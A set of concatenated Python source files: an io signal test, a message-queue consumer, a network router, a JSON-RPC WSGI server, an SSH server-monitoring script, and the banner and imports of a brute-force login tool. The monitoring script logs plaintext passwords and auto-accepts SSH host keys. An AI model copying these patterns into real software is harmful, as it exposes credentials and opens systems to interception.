wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
queue_consumer.py
|
from logging import getLogger
import eventlet
from eventlet import event
import threading
from nameko_proxy.event_queue import EventQueue
from kombu import Connection
from kombu.messaging import Consumer
from kombu.mixins import ConsumerMixin
from nameko.constants import (
AMQP_URI_CONFIG_KEY, DEFAULT_SERIALIZER, SERIALIZER_CONFIG_KEY,
HEARTBEAT_CONFIG_KEY, DEFAULT_HEARTBEAT, TRANSPORT_OPTIONS_CONFIG_KEY,
DEFAULT_TRANSPORT_OPTIONS, AMQP_SSL_CONFIG_KEY
)
logger = getLogger()
class QueueConsumer(ConsumerMixin):
PREFETCH_COUNT_CONFIG_KEY = 'PREFETCH_COUNT'
DEFAULT_KOMBU_PREFETCH_COUNT = 10
def __init__(self, timeout=None):
self.timeout = timeout
self.provider = None
self.queue = None
self.prefetch_count = None
self.serializer = None
self.accept = []
self._managed_threads = []
self._consumers_ready = EventQueue()
self._connection = None
self._thread = None
@property
def amqp_uri(self):
return self.provider.container.config[AMQP_URI_CONFIG_KEY]
@property
def connection(self):
if not self._connection:
heartbeat = self.provider.container.config.get(
HEARTBEAT_CONFIG_KEY, DEFAULT_HEARTBEAT
)
transport_options = self.provider.container.config.get(
TRANSPORT_OPTIONS_CONFIG_KEY, DEFAULT_TRANSPORT_OPTIONS
)
ssl = self.provider.container.config.get(AMQP_SSL_CONFIG_KEY)
self._connection = Connection(self.amqp_uri,
transport_options=transport_options,
heartbeat=heartbeat,
ssl=ssl
)
return self._connection
def register_provider(self, provider):
logger.debug("QueueConsumer registering: %s", provider)
self.provider = provider
self.queue = provider.queue
self.serializer = provider.container.config.get(SERIALIZER_CONFIG_KEY, DEFAULT_SERIALIZER)
self.prefetch_count = self.provider.container.config.get(
self.PREFETCH_COUNT_CONFIG_KEY, self.DEFAULT_KOMBU_PREFETCH_COUNT)
self.accept = [self.serializer]
self.start()
def start(self):
self._thread = threading.Thread(target=self._handle_thread)
self._thread.daemon = True
self._thread.start()
self._consumers_ready.wait()
def _handle_thread(self):
logger.info("QueueConsumer starting...")
try:
self.run()
except Exception as error:
logger.error("Managed thread end with error: %s", error)
if not self._consumers_ready.ready():
self._consumers_ready.send_exception(error)
def on_consume_ready(self, connection, channel, consumers, **kwargs):
if not self._consumers_ready.ready():
self._consumers_ready.send(None)
def on_connection_error(self, exc, interval):
logger.warning(
"Error connecting to broker at {} ({}).\n"
"Retrying in {} seconds.".format(self.amqp_uri, exc, interval))
def unregister_provider(self, _):
if self._connection:
self.connection.close()
self.should_stop = True
def get_consumers(self, _, channel):
consumer = Consumer(channel, queues=[self.provider.queue], accept=self.accept,
no_ack=False, callbacks=[self.provider.handle_message])
consumer.qos(prefetch_count=self.prefetch_count)
return [consumer]
@staticmethod
def ack_message(msg):
msg.ack()
|
router.py
|
from socket import (
socket,
SOCK_DGRAM,
SOL_SOCKET,
SO_REUSEADDR,
SOCK_STREAM,
SO_BROADCAST,
)
from time import sleep
from json import loads, dumps
from threading import Thread, Semaphore
from queue import Queue
from ..utils.network import (
Decode_Response,
Encode_Request,
Send_Broadcast_Message,
Tcp_Sock_Reader,
Tcp_Message,
Udp_Message,
Udp_Response
)
from io import BytesIO
# Funcionamiento del Router:
# Hilo1 busca un listado de mq (similar al cliente) y pide un request y lo encola en una lista si esta esta vacia (ojo, semaforo)
# Hilo2 desencola el request si existe , lo procesa y se conecta finalmente con el cliente con el resultado final
# Clase base para el router
class Router:
def __init__(self):
# mutex
self.channel = []
self.mutex = Semaphore()
self.Broadcast_Address = "192.168.2.31"
self.Broadcast_Port = 10002
self.am_ip = "127.0.0.1"
self.sm_ip = "192.168.2.7"
self.bd_port = 9342
def serve(self):
Thread(target=self._recieve,daemon=True,name="recieve").start()
Thread(target=self._resolve,daemon=True,name="resolve").start()
while(True):
sleep(5)
# Hilo que se va a conectar al mq para recbir un mensaje
def _recieve(self):
while(True):
result = Send_Broadcast_Message('get',self.Broadcast_Address,self.Broadcast_Port,Udp_Response)
if result and not len(self.channel):
with self.mutex:
message = result
print(message)
self.channel.append(message)
else:
sleep(5)
# Hilo que va a procesar el pedido
def _resolve(self):
''' Hilo que va a procesar el pedido '''
while(True):
self.mutex.acquire()
if not len(self.channel):
self.mutex.release()
sleep(5)
else:
print('channel',self.channel)
req = self.channel.pop()
self.mutex.release()
# Pedido desde un cliente
if "get" in req:
ip = req["ip"]
port = req["port"]
info = req["get"]
msg = {"get":info}
response = None
if info == "full_list":
response = Tcp_Message(msg,self.am_ip,self.bd_port)
else:
response = Tcp_Message(msg,self.sm_ip,self.bd_port)
#Enviar la respuesta
Udp_Message(response,ip,port)
print(response)
# Pedido desde un productor
else:
#Mandar el update a la bd1
#Mandar el update a la bd2
#Tcp_Message(req,self.am_ip,self.bd_port)
Tcp_Message(req,self.sm_ip,self.bd_port)
Router().serve()
|
jayrboltonTestServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from jayrboltonTest.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'jayrboltonTest'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from jayrboltonTest.jayrboltonTestImpl import jayrboltonTest # noqa @IgnorePep8
impl_jayrboltonTest = jayrboltonTest(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'jayrboltonTest'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_jayrboltonTest.jayrbolton_contig_filter,
name='jayrboltonTest.jayrbolton_contig_filter',
types=[dict])
self.method_authentication['jayrboltonTest.jayrbolton_contig_filter'] = 'required' # noqa
self.rpc_service.add(impl_jayrboltonTest.status,
name='jayrboltonTest.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'jayrboltonTest ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
WebLogin.py
|
#! /bin/env python
#coding:utf8
from threading import Thread
from Queue import Queue
from socket import error
from re import compile
from ConfigParser import *
#from os import *
import subprocess
import time
import paramiko
import sys
import signal
import Mobigen.Common.Log as Log
SHUTDOWN = False
def shutdown(sigNum, frame):
global SHUTDOWN
SHUTDOWN = True
sys.stderr.write("Catch Signal :%s" % sigNum)
sys.stderr.flush()
signal.signal(signal.SIGTERM, shutdown) # sigNum 15 : Terminate
signal.signal(signal.SIGINT, shutdown) # sigNum 2 : Interrupt
signal.signal(signal.SIGHUP, shutdown) # sigNum 1 : HangUp
signal.signal(signal.SIGPIPE, shutdown) # sigNum 13 : Broken Pipe
class WebLogin(object):
def __init__(self, ip, username, password, password2, port=22):
self.ip =ip
self.uname = username
self.pw = password
self.pw2 = password2
self.port = int(port)
self.client = paramiko.SSHClient()
self.OKFlag = "OK"
def SSHClinetConnection(self):
client = self.client
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
__LOG__.Trace( 'SSH IP : %s , USER : %s , PORT : %s' %(self.ip, self.uname, str(self.port)) )
client.connect(self.ip, username=self.uname, password=self.pw, port=self.port, timeout=10)
except:
__LOG__.Trace( 'SSH2 IP : %s , USER : %s , PORT : %s' %(self.ip, self.uname, str(self.port)) )
client.connect(self.ip, username=self.uname, password=self.pw2, port=self.port, timeout=10)
def commandDISK(self):
stdin, stdout, stderr = self.client.exec_command('df -m')
dlist = []
for line in stdout:
line = line.strip()
dlist.append(line.split())
#get total list
rl =[]
for idx in range(1, len(dlist)):
if len(dlist[idx])==1:
rl.append(dlist[idx]+dlist[idx+1])
elif len(dlist[idx])==6:
rl.append(dlist[idx])
del(dlist)
#get total, use, free, usage value
result = []
for i in range(len(rl)):
total = int(rl[i][2])+int(rl[i][3])
tmp =[]
for j in [5,1,2,3,4]:
if j==1:
tmp.append(str(total)) #total = use+free
elif j==4:
tmp.append(str(int(rl[i][2])*100/total)) #usage percent = use / total
else:
tmp.append(rl[i][j])
result.append({'STATUS':'OK','VALUE':tmp})
del(tmp)
del(rl)
return result
def commandSWAP(self):
stdin, stdout, stderr = self.client.exec_command('free -m')
slist =[]
for line in stdout:
line = line.strip()
slist.append(line.split())
#print slist
result =[]
used = int(slist[len(slist)-1][2]) # free -m 의 used 컬럼 값
free = int(slist[len(slist)-1][3]) # free -m 의 free 컬럼 값
total = used + free
result.append(str(total))
result.append(str(used))
result.append(str(free))
result.append(str(used*100/total))
retdic={'STATUS':'OK','VALUE':result}
return retdic
def commandLOAD_AVG(self): # 부하평균
result=[]
stdin, stdout, stderr = self.client.exec_command('uptime')
patt = compile(r"[0-9]?\.[0-9]{2}")
for line in stdout:
loadavg = patt.findall(line)
result.append(loadavg[0])
result.append(loadavg[1])
result.append(loadavg[2])
retdic={'STATUS':'OK','VALUE':result} # load average 3개의 값
return retdic
def commandMEMORY(self):
stdin, stdout, stderr = self.client.exec_command('free -m')
flist =[]
for line in stdout:
line = line.strip()
flist.append(line.split())
#total = used + free + buffers + cached
total = int(flist[1][2])+int(flist[1][3])+int(flist[1][5])+int(flist[1][6])
#real free memory = free + buffers + cached
free_memory = int(flist[1][3])+int(flist[1][5])+int(flist[1][6])
#real use memory = total - (free + buffers + cached)
use_memory = total - free_memory
#real usage percent = (use_memory+free_memory)/use_memory
usage_percent = use_memory*100 / total
result =[]
result.append(str(total))
result.append(str(use_memory))
result.append(str(free_memory))
result.append(str(usage_percent)[:2])
retdic={'STATUS':'OK','VALUE':result}
return retdic
def commandHOSTNAME(self):
hlist=[]
stdin, stdout, stderr = self.client.exec_command('hostname')
for line in stdout:
line = line.strip()
hlist.append(line)
retdic={'VALUE':hlist}
return retdic
def run(self):
infodic=dict()
try:
self.SSHClinetConnection()
infodic['HOSTNAME']=self.commandHOSTNAME()
infodic['STATUS']=self.OKFlag
infodic['LOAD_AVG']=self.commandLOAD_AVG()
infodic['DISK']=self.commandDISK()
infodic['MEMORY']=self.commandMEMORY()
infodic['SWAP']=self.commandSWAP()
self.client.close()
__LOG__.Trace(infodic)
return infodic
except :
self.OKFlag = "NOK"
infodic['STATUS']=self.OKFlag
shell = "hostname"
p = subprocess.Popen(shell,shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
hostname = p.stdout.readline()
hostname = hostname.strip()
infodic['HOSTNAME']={'VALUE': [hostname]}
self.client.close()
__LOG__.Trace(infodic)
__LOG__.Exception()
return infodic
class JobProcess(object):
def __init__(self, svrobjlist):
self.data_q = Queue([])
self.THREADPOOL = 10
self.total = dict()
self.putdata(svrobjlist)
def job_process(self,th_id):
while not SHUTDOWN:
try:
ip,obj = self.data_q.get_nowait()
__LOG__.Trace('thread get : %s ' % th_id)
except:
__LOG__.Trace("thread %s is done" % th_id)
break
self.total[ip] = obj.run()
time.sleep(0.1)
def putdata(self, svrobjlist):
for ip,svrobj in svrobjlist:
self.data_q.put((ip,svrobj))
def makeThreadlist(self):
th_list = list()
for i in range(self.THREADPOOL):
th_obj = Thread(target=self.job_process, args=[i])
th_list.append(th_obj)
return th_list
def run(self):
th_list = self.makeThreadlist()
for th_obj in th_list:
th_obj.start()
for th_obj in th_list:
th_obj.join()
__LOG__.Trace("[Collect]SERVER RESOURCE END_______________________")
return self.total
class ServerResource(object):
def __init__(self, getconfigparser):
self.config = getconfigparser
def getConfParser(self):
conflist = list()
conf_dict = dict()
type_list = ['SSH_PORT','USER','PASSWD','PASSWD2']
for rsc_ip in self.config.get('RESOURCES','SERVER_LIST').split(','):
conf_dict['IP'] =rsc_ip
for type in type_list:
try:
conf_dict[type] = self.config.get(rsc_ip,type)
except:
conf_dict[type] = self.config.get('RESOURCES',type)
conflist.append((conf_dict['IP'], conf_dict['SSH_PORT'], conf_dict['USER'], conf_dict['PASSWD'], conf_dict['PASSWD2']))
# __LOG__.Trace(conflist)
return conflist
def run(self):
svrlist =[]
__LOG__.Trace("[Collect]SERVER RESOURCE START_____________________")
infolist = self.getConfParser()
for tup in infolist:
__LOG__.Trace('IP : %s, UserName : %s , Password : %s, Passworkd2 : %s, port : %s' %( tup[0],tup[2],tup[3],tup[4],tup[1]) )
svr_obj = WebLogin(tup[0],tup[2],tup[3],tup[4],tup[1]) # ip, username, password, password2, port=22
svrlist.append((tup[0],svr_obj))
jp_obj = JobProcess(svrlist)
return jp_obj.run()
|
brutespray.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from argparse import RawTextHelpFormatter
import readline, glob
import sys, time, os
import subprocess
import xml.dom.minidom
import re
import argparse
import argcomplete
import threading
import itertools
import tempfile
import shutil
from multiprocessing import Process
services = {}
loading = False
class colors:
white = "\033[1;37m"
normal = "\033[0;00m"
red = "\033[1;31m"
blue = "\033[1;34m"
green = "\033[1;32m"
lightblue = "\033[0;34m"
banner = colors.red + r"""
#@ @/
@@@ @@@
%@@@ @@@.
@@@@@ @@@@%
@@@@@ @@@@@
@@@@@@@ @ @@@@@@@
@(@@@@@@@% @@@@@@@ &@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@( @@@@@#@@@@@@@@@*@@@,@@@@@@@@@@@@@@@ @@@
@@@@@@ .@@@/@@@@@@@@@@@@@/@@@@ @@@@@@
@@@ @@@@@@@@@@@ @@@
@@@@* ,@@@@@@@@@( ,@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@.@@@@@@@@@@@@@@@ @@@
@@@@@@ @@@@@ @@@@@@
@@@@@@@@@@@@@
@@ @@@ @@
@@ @@@@@@@ @@
@@% @ @@
"""+'\n' \
+ r"""
██████╗ ██████╗ ██╗ ██╗████████╗███████╗███████╗██████╗ ██████╗ █████╗ ██╗ ██╗
██╔══██╗██╔══██╗██║ ██║╚══██╔══╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔══██╗╚██╗ ██╔╝
██████╔╝██████╔╝██║ ██║ ██║ █████╗ ███████╗██████╔╝██████╔╝███████║ ╚████╔╝
██╔══██╗██╔══██╗██║ ██║ ██║ ██╔══╝ ╚════██║██╔═══╝ ██╔══██╗██╔══██║ ╚██╔╝
